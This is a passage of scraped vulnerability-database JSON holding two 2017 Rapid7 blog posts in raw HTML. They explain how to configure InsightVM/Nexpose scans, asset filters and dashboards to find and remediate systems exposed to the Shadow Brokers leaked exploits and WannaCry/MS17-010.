href=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\"><img class=\"jive-image\" height=\"217\" src=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\" style=\"border-style: none;\" width=\"402\"/></a></span></span></p><p>Next, configure your Scan Template for specific vulnerability checks. 
Tailor your template by looking only for the checks associated with the CVEs exploited by the Shadow Brokers leak.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: 
#000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span 
style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><h4></h4><p>Use the CVEs to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FSelecting_vulnerability_checks.html\" rel=\"nofollow\" target=\"_blank\">search for the checks and add to your template</a>. 
Here, I&#8217;ve added CVE-2017-0144.</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\"><img class=\"jive-image\" height=\"111\" src=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\" style=\"border-style: none;\" width=\"446\"/></a></span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Now that you&#8217;ve got one template squared away, you can take your new Scan Template out for a spin on an entire Site, or an ad hoc scan, or you might want to check out <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7778\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/01/25/scan-configuration-improvements-in-nexpose\">improvements to Scan Configuration</a> to target a scan for just the subset of a Site.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you don&#8217;t have time for manual scans, create an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7261\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2015/10/08/nexpose-60-new-feature-adaptive-security\">Automated Action</a> to scan an asset when it is discovered on your network. 
Whether you&#8217;ve discovered the asset via DHCP discovery connection or just by a regular discovery scan, you can use Automated Actions to scan the Asset when it appears.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Give your stakeholders a view</h2><p>I couldn&#8217;t leave you without one final tried and true tip for satisfying demanding executive stakeholders: You can always create a new dashboard!</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>I&#8217;ve created a custom Shadow Brokers Leak dashboard to house all the cards and analysis I&#8217;ll need.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\"><img class=\"jive-image\" height=\"308\" src=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\" style=\"border-style: none;\" width=\"324\"/></a></span></p><p>Next, I&#8217;ll start adding Cards that I&#8217;d like to work with. Let&#8217;s use the Newly Discovered Assets card as a starting point. 
I&#8217;ve added this card to my Dashboard and I&#8217;ll click Expand Card to drill in.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\"><img class=\"jive-image\" height=\"266\" src=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\" style=\"border-style: none;\" width=\"197\"/></a></span></p><p>Next, I&#8217;ll create a new filter to look only for Assets that are affected by the CVEs and hotfixes identified above. I&#8217;ll paste this into the Filter field:</p><p><strong>*UPDATE: Corrected May 24, 2017: Changed \"ms10-068\" to \"ms14-068\"*</strong></p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" OR asset.vulnerability.title CONTAINS \"ms10-061\" OR asset.vulnerability.title CONTAINS \"ms14-068\" OR asset.vulnerability.title CONTAINS \"ms09-050\" OR asset.vulnerability.title CONTAINS \"ms08-067\" OR asset.vulnerability.title CONTAINS \"ms17-010\"</span></p></blockquote><p>It&#8217;ll look something like this:</p><p><span style=\"font-size: 11pt; font-family: Calibri; color: #212121;\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a 
href=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\"><img class=\"jive-image\" height=\"132\" src=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\" style=\"border-style: none;\" width=\"624\"/></a></span> </span></p><p>I&#8217;ve saved this filter so I can use it across any number of cards I wish. Since I&#8217;ve done the work of creating the filter once, it is straightforward to add cards, apply the filter, and then save the Cards to my dashboard. I&#8217;ve built a tailored view, showing the impact of the Shadow Brokers leaked exploits on my organization.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\"><img class=\"jive-image\" height=\"379\" src=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you&#8217;re feeling comfortable with this approach, take a step further! Try out an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7838\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/04/24/actionable-remediation-projects\">Actionable Remediation Project</a> from here and get started taking down these risks on your turf.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Not a customer of ours? 
<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Try a free 30-day trial of InsightVM here</a>.</p><h4></h4></div><!-- [DocumentBodyEnd:f67c4b5d-4e9f-4a32-a187-cc604c412a04] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits", "modified": "2017-05-24T23:14:26", "lastseen": "2017-05-25T17:57:11", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-15T18:25:42", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-15T18:48:41", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", 
"MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-15T18:48:41", "rev": 2}}, "id": "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 190, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-15T17:48:40", "bulletin": {"published": "2017-05-15T17:30:34", "enchantments": {}, "id": "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 8, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- 
[DocumentBodyStart:425e125a-783e-4160-8d35-eab296a1b1bb] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 
11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. 
Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. 
Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with over 190 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 
10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. 
Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p 